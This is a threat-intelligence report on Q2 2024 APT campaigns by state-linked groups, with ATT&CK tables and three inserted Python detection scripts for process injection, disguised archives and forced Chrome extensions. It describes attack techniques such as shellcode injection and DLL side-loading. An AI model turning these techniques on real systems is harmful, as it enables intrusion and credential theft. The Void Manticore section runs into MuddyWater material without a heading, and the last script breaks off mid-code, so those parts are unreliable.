
APT Quarterly Highlights : Q2 2024 - cyfirma





Published On : 2024-07-19

EXECUTIVE SUMMARY

In the second quarter of 2024, Advanced Persistent Threat (APT) groups from China, North Korea, Iran, and Russia demonstrated a surge in dynamic and innovative cyber activities, significantly challenging the global cybersecurity landscape.

Starting with Iran, state-sponsored threat actors exhibited advanced capabilities across various regions and sectors. Void Manticore (Storm-842) targeted Israeli organizations and Albania with destructive attacks and data theft, using custom wipers and web shells. MuddyWater focused on the Middle East, employing spear-phishing and remote monitoring tools to infiltrate the aviation and energy sectors. APT42 (Mint Sandstorm) impersonated journalists to gather intelligence in the US, Europe, and the Middle East, using custom backdoors like TAMECAT and NICECURL, underscoring the persistent and evolving threat from Iranian cyber actors.

Russian threat actors also demonstrated advanced cyber-espionage capabilities. APT28 (Forest Blizzard) targeted Polish government institutions with spear-phishing and DLL side-loading, and exploited CVE-2022-38028 in the Windows Print Spooler with its GooseEgg tool. Sandworm (APT44) used the Kapeka backdoor in attacks on Eastern Europe, focusing on ransomware and credential theft. FIN7 (Carbon Spider) expanded its focus from retail and hospitality to the defense, insurance, and transportation sectors, deploying the Anunak backdoor via spear-phishing. These activities highlight the sophisticated threats from Russian APT groups, necessitating heightened security measures.

Meanwhile, Chinese state-sponsored threat actors exhibited notable cyber-espionage capabilities. RedJuliett targeted Taiwan and expanded operations to Hong Kong, South Korea, and the US, exploiting network device vulnerabilities to gather intelligence. APT41 (WICKED PANDA) continued its espionage with the resilient KEYPLUG malware on both Windows and Linux platforms. Earth Freybug, a subset of APT41, used DLL hijacking and API unhooking with the UNAPIMON malware to evade detection and conduct sophisticated reconnaissance, emphasizing the persistent and advanced threats from Chinese cyber groups.

Lastly, North Korean cyber threat actors intensified their espionage efforts. Kimsuky (Springtail) targeted South Korea with the new Gomir backdoor and sophisticated social engineering attacks, including the ReconShark malware delivered via Facebook and the TRANSLATEXT Chrome extension. Moonstone Sleet (Storm-1789) engaged in financial and cyber espionage using fake companies, custom ransomware, and trojanized tools. The Lazarus Group used fake job lures to deliver the Kaolin RAT and exploited vulnerabilities for security bypasses. Andariel targeted Korean corporations with advanced RAT malware like Nestdoor and Dora RAT, highlighting North Korea’s persistent and evolving cyber capabilities.

This report provides a comprehensive analysis of the dynamic APT activities observed in Q2 2024, emphasizing the need for ongoing vigilance, user education, and prompt software updates in the ever-evolving cybersecurity landscape.

KEY TRENDS OBSERVED IN Q2 2024

- Iranian APT activities were driven by the motive to advance Iran’s intelligence objectives, particularly those aligned with the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO), by gathering valuable intelligence and influencing decision-making processes to further Iran’s strategic interests in the region.
- Alongside APT28, other threat actors like APT29, MISSION2025, and Stone Panda have also targeted CVE-2022-38028.
- There is a noticeable trend towards the diversification of attack techniques among North Korean APT groups. They are employing sophisticated methods, such as social engineering through platforms like Facebook, and leveraging vulnerabilities in widely used applications and protocols.
- Chinese APT groups are exploiting vulnerabilities in firewalls, VPNs, and load balancers globally to initiate attacks. This strategic approach demonstrates their intent to target a wide range of organizations regardless of geographical boundaries, emphasizing a broad-spectrum targeting strategy.
- Chinese threat actors are continuously advancing their tactics, blending sophisticated multi-stage attacks with innovative evasion techniques. Additionally, there is a notable trend towards developing new, sophisticated malware strains. This dual approach underscores their agility and adaptability in circumventing defenses and maintaining persistence in compromised networks.

IRANIAN APT ACTIVITIES

Targeted Countries: Israel, Albania, Turkey, Azerbaijan, Jordan, Saudi Arabia, United States, Europe, Middle East
Targeted Technologies: Windows operating system, PowerShell, Microsoft SharePoint, ScreenConnect, Atera, MeshCentral, Remote Monitoring and Management (RMM) tools
Targeted Industries: Government, Finance, Critical Infrastructure, NGOs, Media outlets, Academia, Legal services, Activist groups, Aviation, Communications, Energy

VOID MANTICORE AND SCARRED MANTICORE

Void Manticore (aka Storm-842) is an Iranian state-sponsored threat actor notorious for conducting destructive attacks on Israeli organizations and leaking information through the online persona ‘Karma’ (sometimes written as KarMa). Their operations target sectors such as government, finance, and critical infrastructure, aligning with Iran’s broader offensive strategy. Using straightforward and efficient techniques aimed at causing rapid and significant damage, they extend their attacks beyond Israel to countries like Albania, where they adopt the persona ‘Homeland Justice’ to leak stolen data. In Israel, Void Manticore is notable for using a custom wiper named BiBi, named after Israeli Prime Minister Benjamin Netanyahu.
In recently observed campaigns, MuddyWater initiates attacks through phishing emails sent from various legitimate domains controlled by the attacker. These emails contain links to download compressed files, which disguise malicious or seemingly benign RMM tools. Once activated, these tools enable the attacker to remotely control compromised systems, facilitating activities like file transfers, input device manipulation, and screen capturing. Additionally, the group deploys a C/C++-based tool to inject shellcode into targeted processes like msedge.exe, opera.exe, and powershell.exe, using WinAPI functions such as VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread to execute their malicious payloads.

MITRE ATT&CK Techniques

Tactic                ID         Technique
Initial Access        T1566.002  Phishing: Spearphishing Link
Execution             T1203      Exploitation for Client Execution
Privilege Escalation  T1548      Abuse Elevation Control Mechanism
Defense Evasion       T1036      Masquerading
Defense Evasion       T1548      Abuse Elevation Control Mechanism
Defense Evasion       T1562      Impair Defenses
Defense Evasion       T1562.001  Disable or Modify Tools
Defense Evasion       T1564      Hide Artifacts
Defense Evasion       T1564.003  Hidden Window
Credential Access     T1003      OS Credential Dumping
Credential Access     T1552      Unsecured Credentials
Credential Access     T1552.001  Credentials In Files
Credential Access     T1555      Credentials from Password Stores
Credential Access     T1555.003  Credentials from Web Browsers
Discovery             T1012      Query Registry
Discovery             T1057      Process Discovery
Discovery             T1082      System Information Discovery
Collection            T1005      Data from Local System
Command and Control   T1071      Application Layer Protocol
Command and Control   T1573      Encrypted Channel
Impact                T1485      Data Destruction

APT42, MINT SANDSTORM

APT42, a notorious cyber espionage group linked to the Iranian state and operating under the alias Mint Sandstorm, has been orchestrating a highly sophisticated social engineering campaign, impersonating journalists to infiltrate networks and gather intelligence, particularly from high-profile experts in Middle Eastern affairs. Their operations span strategic regions, including the United States, Israel, Europe, and the Middle East, and target a diverse range of industries such as NGOs, media outlets, academia, legal services, and activist groups. The attack’s initial phase involves crafting credible journalist personas to establish trust with targets, which is then exploited to gain unauthorized network access. APT42 employs custom backdoors like TAMECAT, a PowerShell toehold for executing arbitrary commands, and NICECURL, a VBScript backdoor for downloading and executing additional modules for data mining and command execution. Their activities are driven by the motive to advance Iran’s intelligence objectives, particularly those aligned with the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO), by gathering valuable intelligence and influencing decision-making processes to further Iran’s strategic interests in the region.
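The MuddyWater injector described above allocates memory in msedge.exe, opera.exe or powershell.exe, writes shellcode into it and starts a remote thread; on an endpoint running Sysmon those steps surface as an Event ID 8 (CreateRemoteThread) record. The following is an added example, not code from the report: it runs a simple rule over constructed Sysmon-style records and flags threads started in those targets by a process outside an assumed allow-list, noting when the thread start address is not backed by any loaded module.

```python
"""Flag Sysmon Event ID 8 (CreateRemoteThread) records that look like shellcode injection
into the browser and PowerShell processes named in the MuddyWater section.

Added example, not cyfirma's code. Records are constructed in a flat "Key: Value" form;
the allow-list of expected thread sources is an assumption to tune per environment.
"""
from typing import Dict, List

# Processes the report names as the injector's targets.
WATCHED_TARGETS = {"msedge.exe", "opera.exe", "powershell.exe"}

# Assumed allow-list: processes that start threads in other processes as part of
# normal Windows operation on many hosts (constructed; adjust to your baseline).
EXPECTED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wbem\wmiprvse.exe",
}

# Constructed records (not real telemetry). Fields mirror Sysmon's EID 8 schema;
# StartModule is "-" when the thread start address lies outside any loaded module.
SAMPLE_EVENTS = [
    "EventID: 8|SourceImage: C:\\Users\\u\\AppData\\Local\\Temp\\updater.exe"
    "|TargetImage: C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"
    "|StartAddress: 0x00000258A1B20000|StartModule: -|StartFunction: -",
    "EventID: 8|SourceImage: C:\\Windows\\System32\\csrss.exe"
    "|TargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|StartAddress: 0x00007FF8B2C41E30|StartModule: C:\\Windows\\System32\\ntdll.dll"
    "|StartFunction: EtwpCreateEtwThread",
    "EventID: 8|SourceImage: C:\\Users\\u\\Downloads\\scan.exe"
    "|TargetImage: C:\\Users\\u\\AppData\\Local\\Programs\\Opera\\opera.exe"
    "|StartAddress: 0x0000020C4F1A0000|StartModule: -|StartFunction: -",
    "EventID: 1|Image: C:\\Windows\\System32\\notepad.exe|ParentImage: C:\\Windows\\explorer.exe",
]


def parse_event(line: str) -> Dict[str, str]:
    """Split a 'Key: Value|Key: Value' record into a dict (first ': ' separates key and value)."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value.strip()
    return fields


def image_name(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def remote_thread_reasons(ev: Dict[str, str]) -> List[str]:
    """Return why an EID 8 record is suspicious, or an empty list if it is not."""
    if ev.get("EventID") != "8":
        return []
    target = image_name(ev.get("TargetImage", ""))
    source = ev.get("SourceImage", "").lower()
    if target not in WATCHED_TARGETS or source in EXPECTED_SOURCES:
        return []
    reasons = [f"thread created in {target} by non-allow-listed {image_name(source)}"]
    if ev.get("StartModule", "-") in ("-", ""):
        reasons.append("start address not backed by a loaded module (shellcode-like)")
    return reasons


def find_injections(lines: List[str]) -> List[Dict[str, object]]:
    """Apply the rule to every record; each hit carries source, target and reasons."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        ev = parse_event(line)
        reasons = remote_thread_reasons(ev)
        if reasons:
            hits.append({"source": ev["SourceImage"],
                         "target": image_name(ev["TargetImage"]),
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_injections(SAMPLE_EVENTS):
        print(f"[ALERT] {hit['source']} -> {hit['target']}: " + "; ".join(hit["reasons"]))
```

The same rule can be fed from a SIEM export of Sysmon EID 8 by mapping its columns onto the field names above; pair it with EID 10 (ProcessAccess) for the VirtualAllocEx/WriteProcessMemory stage.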
MITRE ATT&CK Techniques

Tactic                ID         Technique
Execution             T1203      Exploitation for Client Execution
Defense Evasion       T1036      Masquerading
Defense Evasion       T1564      Hide Artifacts
Defense Evasion       T1564.003  Hidden Window
Credential Access     T1003      OS Credential Dumping
Credential Access     T1552      Unsecured Credentials
Credential Access     T1552.001  Credentials In Files
Credential Access     T1555      Credentials from Password Stores
Credential Access     T1555.003  Credentials from Web Browsers
Discovery             T1012      Query Registry
Discovery             T1082      System Information Discovery
Collection            T1005      Data from Local System
Command and Control   T1071      Application Layer Protocol
Command and Control   T1573      Encrypted Channel
Impact                T1485      Data Destruction

RUSSIAN APT ACTIVITIES

Targeted Countries: United States, Europe, Poland, Estonia, Ukraine
Targeted Technologies: Windows Print Spooler service, Windows
Targeted Industries: Government, Automotive Manufacturer

APT28

Forest Blizzard, also known as STRONTIUM (APT28), is a Russia-based threat actor that focuses on strategic intelligence gathering to support Russian government foreign policy initiatives. Forest Blizzard employs GooseEgg, a custom post-compromise tool, to gain elevated access to target systems, steal credentials, and facilitate malicious activities such as remote code execution, installing backdoors, and lateral movement within compromised networks. The group exploits CVE-2022-38028 (CVSS 7.8) in the Windows Print Spooler service, using GooseEgg to modify a JavaScript constraints file and execute commands with SYSTEM-level permissions, which lets it launch arbitrary executables or DLLs with elevated privileges. They manipulate registry keys, create custom protocol handlers, and hijack symbolic links to redirect system processes and execute malicious code. Historically, Forest Blizzard has targeted government, energy, transportation, NGOs, media, IT, sports organizations, and educational institutions, primarily in the United States and Europe.

Their activities pose significant risks, including data breaches, credential theft, unauthorized access, and the compromise of sensitive information. The actor’s operations can disrupt functions, compromise network integrity, and facilitate espionage aligned with Russian government interests. Organizations are urged to apply security updates and implement defensive measures to mitigate the threat posed by Forest Blizzard. Alongside APT28, other threat actors like APT29, MISSION2025, and Stone Panda have also targeted CVE-2022-38028. The Cybersecurity and Infrastructure Security Agency (CISA) has added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, emphasizing the importance of heightened vigilance and collaboration in defending against sophisticated cyber threats.

MITRE ATT&CK Techniques

Tactic                ID         Technique
Execution             T1059      Command and Scripting Interpreter
Execution             T1129      Shared Modules
Defense Evasion       T1027      Obfuscated Files or Information
Defense Evasion       T1112      Modify Registry
Discovery             T1033      System Owner/User Discovery
Discovery             T1082      System Information Discovery
Discovery             T1083      File and Directory Discovery
Discovery             T1087      Account Discovery
Command and Control   T1071      Application Layer Protocol

Another sophisticated cyber-espionage campaign attributed to APT28 and linked to the Russian GRU has been actively targeting Polish government institutions. This campaign employs techniques such as DLL side-loading and scripts that download and execute additional payloads, showcasing a high level of technical proficiency and a diverse range of techniques and objectives. APT28’s operations are marked by meticulously crafted spear-phishing emails, which appear legitimate and are personalized for their targets within government agencies. These emails often contain malicious links leading to websites like run[.]mocky[.]io and webhook[.]site, which serve as initial entry points for malware delivery.
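The spear-phishing links above deliver malware as a downloaded archive whose executables wear image names and whose helper script and DLL files are hidden. As an added example (not cyfirma's code), the following screens a ZIP for that pattern: entries whose leading bytes say PE but whose name says image, entries carrying the MS-DOS hidden attribute, and script or library files packed beside media. The archive is constructed in memory and its file names are placeholders.

```python
"""Screen a downloaded archive for the masquerade seen in the APT28 lure: an executable
renamed as an image, with hidden batch and DLL helpers packed beside it.

Added example, not cyfirma's code. The archive is constructed in memory and its
file names are placeholders, not indicators from the report.
"""
import io
import zipfile
from typing import List, Tuple

IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}
HELPER_EXTS = {".bat", ".cmd", ".dll", ".vbs", ".js", ".ps1", ".lnk"}
MSDOS_HIDDEN = 0x02  # FILE_ATTRIBUTE_HIDDEN lives in the low byte of ZipInfo.external_attr


def content_type(head: bytes) -> str:
    """Magic-number sniff of the first bytes; enough to expose a PE behind an image name."""
    if head.startswith(b"MZ"):
        return "pe"
    if head.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if head.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    if head.startswith(b"GIF8"):
        return "gif"
    if head.startswith(b"BM"):
        return "bmp"
    return "unknown"


def extension(name: str) -> str:
    """Lower-cased extension including the dot, or '' when the name has none."""
    base = name.rsplit("/", 1)[-1]
    return "." + base.rsplit(".", 1)[-1].lower() if "." in base else ""


def inspect_archive(data: bytes) -> List[Tuple[str, str]]:
    """Return (entry name, finding) pairs; an empty list means nothing stood out."""
    findings: List[Tuple[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            ext = extension(info.filename)
            with zf.open(info) as fh:
                kind = content_type(fh.read(16))
            if ext in IMAGE_EXTS and kind == "pe":
                findings.append((info.filename, "PE executable behind an image extension"))
            elif ext in IMAGE_EXTS and kind == "unknown":
                findings.append((info.filename, "image extension but unrecognised content"))
            if info.external_attr & MSDOS_HIDDEN:
                findings.append((info.filename, "hidden attribute set"))
            if ext in HELPER_EXTS:
                findings.append((info.filename, f"{ext} script or library in a media archive"))
    return findings


def build_sample_archive() -> bytes:
    """Constructed lure: renamed executable, hidden batch file, hidden DLL, and a genuine JPEG."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("photo.jpg", b"MZ" + b"\x00" * 126)  # PE magic only, not a real program
        bat = zipfile.ZipInfo("photo.bat")
        bat.external_attr = MSDOS_HIDDEN
        zf.writestr(bat, b"@echo off\r\nrem placeholder\r\n")
        dll = zipfile.ZipInfo("helper.dll")
        dll.external_attr = MSDOS_HIDDEN
        zf.writestr(dll, b"MZ" + b"\x00" * 126)
        zf.writestr("real.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 60)
    return buf.getvalue()


if __name__ == "__main__":
    for name, finding in inspect_archive(build_sample_archive()):
        print(f"{name}: {finding}")
```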
Once victims click on these links, they inadvertently download a ZIP archive containing malware disguised as image files, including a Windows Calculator binary masquerading as a JPG image file, along with hidden batch script and DLL files. APT28 utilizes DLL side-loading to load a malicious DLL while executing a legitimate application, evading detection by security software and allowing it to execute malicious code surreptitiously, thereby compromising the victim’s system. They demonstrate a keen understanding of network evasion tactics, leveraging widely used services like run[.]mocky[.]io and webhook[.]site to obscure their activities and reduce the likelihood of detection. Additionally, APT28 employs a multi-stage attack approach with social engineering tactics to maintain the illusion of legitimacy and deceive victims.

MITRE ATT&CK Techniques

Tactic                ID         Technique
Execution             T1059      Command and Scripting Interpreter
Defense Evasion       T1036      Masquerading
Defense Evasion       T1202      Indirect Command Execution
Defense Evasion       T1562.001  Impair Defenses: Disable or Modify Tools
Defense Evasion       T1564      Hide Artifacts
Defense Evasion       T1564.001  Hidden Files and Directories
Defense Evasion       T1564.003  Hidden Window
Defense Evasion       T1070      Indicator Removal
Credential Access     T1056      Input Capture
Credential Access     T1539      Steal Web Session Cookie
Discovery             T1082      System Information Discovery
Discovery             T1497      Virtualization/Sandbox Evasion
Collection            T1056      Input Capture
Command and Control   T1071      Application Layer Protocol

APT44

A previously undocumented backdoor called Kapeka has been sporadically observed in cyber-attacks targeting Eastern Europe, including Estonia and Ukraine, since mid-2022. Researchers have attributed this malware to the Russia-linked APT group Sandworm (aka APT44 or Seashell Blizzard), which Microsoft tracks under the name KnuckleTouch.
Kapeka is a flexible backdoor that functions as an early-stage toolkit for its operators and provides long-term access to the victim’s systems. It features a dropper designed to launch and execute the backdoor component on the infected host and then remove itself. The dropper sets up persistence for the backdoor either as a scheduled task or as an autorun registry entry, depending on whether the process has SYSTEM privileges. Microsoft noted that Kapeka is involved in multiple campaigns distributing ransomware and can steal credentials and data, conduct destructive attacks, and grant remote access to the device. The backdoor, a Windows DLL written in C++, includes an embedded command-and-control (C2) configuration to establish contact with an actor-controlled server and manage the polling frequency for retrieving commands. Masquerading as a Microsoft Word add-in, the backdoor gathers information about the compromised host and uses multi-threading to process instructions and exfiltrate results to the C2 server. It communicates with its C2 using JSON to send and receive information and can update its C2 configuration on the fly. Key features of the backdoor include reading and writing files, launching payloads, executing shell commands, and upgrading or uninstalling itself.

MITRE ATT&CK Techniques

Tactic                ID         Technique
Execution             T1059      Command and Scripting Interpreter
Execution             T1129      Shared Modules
Defense Evasion       T1027      Obfuscated Files or Information
Defense Evasion       T1027.005  Indicator Removal from Tools
Defense Evasion       T1112      Modify Registry
Defense Evasion       T1140      Deobfuscate/Decode Files or Information
Defense Evasion       T1218.011  System Binary Proxy Execution: Rundll32
Defense Evasion       T1222      File and Directory Permissions Modification
Defense Evasion       T1497      Virtualization/Sandbox Evasion
Discovery             T1012      Query Registry
Discovery             T1033      System Owner/User Discovery
Discovery             T1057      Process Discovery
Discovery             T1082      System Information Discovery
Discovery             T1083      File and Directory Discovery
Discovery             T1087      Account Discovery
Discovery             T1518      Software Discovery
Discovery             T1518.001  Security Software Discovery
Discovery             T1614      System Location Discovery
Collection            T1560      Archive Collected Data
Command and Control   T1071      Application Layer Protocol
Command and Control   T1573      Encrypted Channel

FIN7

FIN7, a Russian advanced persistent threat (APT) group also known as Carbon Spider, ELBRUS, and Sangria Tempest, recently conducted a spear-phishing campaign targeting a US automotive manufacturer. The attackers focused on IT employees with high admin-level rights, luring them with a malicious URL disguised as an IP scanning tool. Upon clicking the link, the Anunak backdoor was deployed, enabling FIN7 to gain an initial foothold using living-off-the-land binaries, scripts, and libraries (LOLBAS). Historically, FIN7 has targeted the US retail, hospitality, and restaurant sectors, but it is now expanding its focus to the defense, insurance, and transportation sectors. Researchers suggest that FIN7 is likely targeting larger entities, anticipating higher ransom payments.
MITRE ATT&CK Techniques

Tactic                ID         Technique
Initial Access        T1566.002  Phishing: Spearphishing Link
Execution             T1204.002  User Execution: Malicious File
Execution             T1059.001  Command and Scripting Interpreter: PowerShell
Execution             T1569.002  System Services: Service Execution
Persistence           T1053.005  Scheduled Task/Job: Scheduled Task
Persistence           T1543.003  Create or Modify System Process: Windows Service
Defense Evasion       T1027      Obfuscated Files or Information
Defense Evasion       T1564.001  Hide Artifacts: Hidden Files and Directories
Defense Evasion       T1222.001  File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Defense Evasion       T1562.004  Impair Defenses: Disable or Modify System Firewall
Discovery             T1124      System Time Discovery
Discovery             T1057      Process Discovery
Discovery             T1087.002  Account Discovery: Domain Account
Discovery             T1069.002  Permission Groups Discovery: Domain Groups
Discovery             T1082      System Information Discovery
Discovery             T1033      System Owner/User Discovery
Lateral Movement      T1021.004  Remote Services: SSH
Command and Control   T1571      Non-Standard Port
Command and Control   T1090      Proxy
Resource Development  T1608.005  Stage Capabilities: Link Target
Resource Development  T1583.001  Acquire Infrastructure: Domains

CHINESE APT ACTIVITIES

Targeted Countries: Taiwan, Hong Kong, South Korea, Laos, United States, Rwanda, Kenya, Djibouti, Italy
Targeted Industries: Aerospace, Education, Semiconductor, Manufacturing, Technology, Government
Targeted Technologies: Windows, Linux

REDJULIETT

In Q2 2024, researchers reported that between November 2023 and April 2024 a likely Chinese state-sponsored group known as RedJuliett exploited known vulnerabilities in network edge devices, such as firewalls, VPNs, and load balancers, for initial access. Operating from Fuzhou, China, RedJuliett persistently targeted Taiwan, likely to support Beijing’s intelligence collection on Taiwan’s economic and diplomatic relations, as well as critical technology development. The group expanded its operations to compromise organizations in Hong Kong, Malaysia, Laos, South Korea, the United States, Djibouti, Kenya, and Rwanda. RedJuliett used SQL injection and directory traversal exploits against web and SQL applications, in addition to targeting internet-facing device vulnerabilities. The group created a SoftEther VPN bridge or client in victim networks and conducted reconnaissance and exploitation using web application security scanners, leveraging open-source web shells and exploiting an elevation-of-privilege vulnerability in Linux. RedJuliett’s infrastructure includes both threat actor-controlled leased servers and compromised infrastructure belonging to Taiwanese universities. The group’s activities align with Beijing’s objectives to gather intelligence on Taiwan’s economic policy, trade, and diplomatic relations, and it has also targeted multiple critical technology companies, emphasizing the strategic importance of this sector for Chinese state-sponsored threat actors.

MITRE ATT&CK Techniques

Tactic                ID         Technique / Sub-technique
Resource Development  T1583.003  Acquire Infrastructure: Virtual Private Server
Resource Development  T1584      Compromise Infrastructure
Reconnaissance        T1595.002  Active Scanning: Vulnerability Scanning
Initial Access        T1190      Exploit Public-Facing Application
Persistence           T1133      External Remote Services
Persistence           T1505.003  Server Software Component: Web Shell
Privilege Escalation  T1068      Exploitation for Privilege Escalation

APT41

APT41, also known as WICKED PANDA, is a highly sophisticated Chinese-backed cyber threat group renowned for its extensive cyber espionage and cybercrime operations. Its latest campaign involves the deployment of the KEYPLUG malware, a modular backdoor written in C++ and active since at least June 2021, with variants for both Windows and Linux platforms. KEYPLUG employs advanced techniques for command and control (C2) communication, including HTTP, TCP, KCP over UDP, and WSS. The malware exhibits high resilience and stealth, remaining undetected in environments with advanced detection solutions. The Windows variant involves a .NET loader that decrypts and executes shellcode, leading to the final payload, while the Linux variant demonstrates even greater complexity. Both variants utilize custom algorithms for API hashing and employ techniques to evade security measures, highlighting the advanced capabilities and persistent threat posed by APT41.

MITRE ATT&CK Techniques

Tactic                ID         Technique / Sub-technique
Initial Access        T1566      Phishing
Execution             T1047      Windows Management Instrumentation
Defense Evasion       T1070.006  Indicator Removal: Timestomp
Defense Evasion       T1497.001  Virtualization/Sandbox Evasion: System Checks
Credential Access     T1056.004  Input Capture: Credential API Hooking
Discovery             T1010      Application Window Discovery
Discovery             T1057      Process Discovery
Discovery             T1082      System Information Discovery
Discovery             T1497      Virtualization/Sandbox Evasion
Discovery             T1518.001  Software Discovery: Security Software Discovery
Collection            T1056.004  Input Capture: Credential API Hooking
Command and Control   T1071      Application Layer Protocol

EARTH FREYBUG

At the beginning of Q2 2024, researchers observed Earth Freybug, a subset of APT41, leveraging DLL hijacking and API unhooking to evade detection with a newly discovered malware, UNAPIMON. This malware employs defense evasion techniques to prevent child processes from being monitored. The attack chain begins with a legitimate process, vmtoolsd.exe, being hijacked to execute a scheduled task that runs a reconnaissance batch file. This file gathers system information and sets up another task to deploy a backdoor through DLL side-loading using the SessionEnv service. UNAPIMON, a DLL, hooks the CreateProcessW function, creates a suspended process, and verifies DLL integrity before unhooking critical APIs in the child process. This allows malicious activities to proceed undetected.
The attack highlights Earth Freybug’s evolving tactics and the effectiveness of simple yet innovative techniques in sophisticated cyber espionage campaigns.

MITRE ATT&CK Techniques

Tactic                ID         Technique / Sub-technique
Execution             T1053      Scheduled Task/Job
Persistence           T1574.002  Hijack Execution Flow: DLL Side-Loading
Defense Evasion       T1562.001  Impair Defenses: Disable or Modify Tools
Discovery             T1082      System Information Discovery

ADDITIONAL OBSERVATIONS

The Chinese APT group ChamelGang has been deploying ransomware in its cyberespionage campaigns, targeting critical sectors like healthcare and government organizations. In 2022, they attacked significant institutions in India and Brazil, and in 2023 they focused on a government organization in East Asia and an aviation organization in the Indian subcontinent. ChamelGang uses CatB ransomware, obfuscated malware like BeaconLoader, and Cobalt Strike beacons for its operations. They utilize publicly available tools for privilege escalation and proxies for routing malicious traffic. Their tactics include obfuscation, exploitation of remote services, and masquerading malware components to evade detection.

NORTH KOREA APT ACTIVITIES

Targeted Countries: South Korea, Asia
Targeted Technologies: Software, Windows, Linux, Applications
Targeted Industries: Government, Software, Education, Manufacturing, Construction

KIMSUKY

In Q2 2024, researchers identified that the North Korean cyber espionage group Springtail (also known as Kimsuky) has been deploying a new Linux backdoor called Gomir in its recent campaign against South Korean organizations. This malware is structurally similar to GoBear and shares extensive code with it. Springtail has a history of targeting South Korean public sector organizations, employing sophisticated methods like spear-phishing and exploiting improperly configured DNS DMARC policies. In its latest campaign, the group used Trojanized software installation packages to distribute a new malware family named Troll Stealer, capable of stealing files, screenshots, browser data, and system information, including the GPKI folder used by South Korean government personnel. Gomir, upon execution, can install itself persistently by creating a system service or configuring a crontab, depending on its privilege level. It communicates with its command-and-control server using HTTP POST requests and supports commands such as executing shell commands, collecting system information, and exfiltrating files. This campaign underscores a heavy focus on supply chain attacks, utilizing techniques such as Trojanized software installers and fake software installers to maximize infection rates among the targeted South Korea-based organizations.

MITRE ATT&CK Techniques

Tactic                ID         Technique / Sub-technique
Defense Evasion       T1027      Obfuscated Files or Information
Defense Evasion       T1027.005  Obfuscated Files or Information: Indicator Removal from Tools
Defense Evasion       T1497.001  Virtualization/Sandbox Evasion: System Checks
Discovery             T1497.001  Virtualization/Sandbox Evasion: System Checks
Discovery             T1518.001  Software Discovery: Security Software Discovery
Command and Control   T1071      Application Layer Protocol
Command and Control   T1095      Non-Application Layer Protocol

The Kimsuky APT group has recently initiated another sophisticated cyber espionage campaign leveraging Facebook as an initial entry point, posing as human rights officials to target anti-North Korea sectors. Using fake profiles, they engage targets via Facebook Messenger, gradually building trust before sharing malicious OneDrive links disguised as legitimate documents, such as ‘My_Essay(prof).msc’. This Microsoft Common Console Document file, when executed, triggers a concealed malware dubbed ReconShark. This variant exhibits advanced capabilities, including stealthy execution and connection to a command and control (C2) server. The malware’s tactics include persistent file manipulation (‘warm.vbs’) and task scheduling (‘OneDriveUpdate’), aimed at maintaining long-term access and exfiltrating sensitive information. The campaign’s global scope and use of deceptive social engineering underscore an evolving threat landscape.

MITRE ATT&CK Techniques

Tactic                ID         Technique
Execution             T1059      Command and Scripting Interpreter
Persistence           T1574.002  Hijack Execution Flow: DLL Side-Loading
Privilege Escalation  T1574.002  Hijack Execution Flow: DLL Side-Loading
Defense Evasion       T1036      Masquerading
Defense Evasion       T1574.002  Hijack Execution Flow: DLL Side-Loading
Discovery             T1046      Network Service Discovery
Discovery             T1082      System Information Discovery
Command and Control   T1071      Application Layer Protocol
Command and Control   T1095      Non-Application Layer Protocol

Meanwhile, in Q2 2024, researchers discovered new activity from Kimsuky involving a malicious Google Chrome extension named “TRANSLATEXT” used for cyber espionage. This extension, uploaded to an attacker-controlled GitHub repository in March, was designed to steal email addresses, usernames, passwords, and cookies, and to capture browser screenshots. TRANSLATEXT bypasses the security measures of prominent email providers like Gmail, Kakao, and Naver. The attack primarily targeted South Korean academics involved in political research related to North Korea. Kimsuky’s tactics included using PowerShell scripts and manipulating the Windows registry to enforce extension installation. The group’s ongoing campaign emphasizes the need for vigilance against such advanced threats.
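The report says Kimsuky manipulated the Windows registry to force the TRANSLATEXT extension onto victims without naming the key; Chrome honours the ExtensionInstallForcelist policy (HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist) for exactly that, so that key is an assumption of the added example below, which is not cyfirma's code. It parses a constructed reg export of the key and flags forced entries that are off an assumed approved list or whose update URL does not point at the Chrome Web Store host.

```python
"""Audit a Chrome ExtensionInstallForcelist export for forced, non-store extensions.

Added example, not cyfirma's code. The input is a constructed `reg export`-style dump
(regedit writes UTF-16 with a BOM; decode it to str before parsing). The approved-ID
allow-list and every extension ID below are placeholders.
"""
import re
from typing import Dict, List
from urllib.parse import urlparse

FORCELIST_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist"
WEB_STORE_UPDATE_HOST = "clients2.google.com"   # host of the Chrome Web Store update service
EXTENSION_ID_RE = re.compile(r"^[a-p]{32}$")    # Chrome extension IDs are 32 chars of a-p

# Assumed allow-list of extension IDs the organisation deploys (constructed value).
APPROVED_IDS = {"abcdefghijklmnopabcdefghijklmnop"}

# Constructed export. Entry 2 models a forced install whose update URL points at a
# code-hosting site instead of the store; entry 3 is a store extension not on the list.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist]
"1"="abcdefghijklmnopabcdefghijklmnop;https://clients2.google.com/service/update2/crx"
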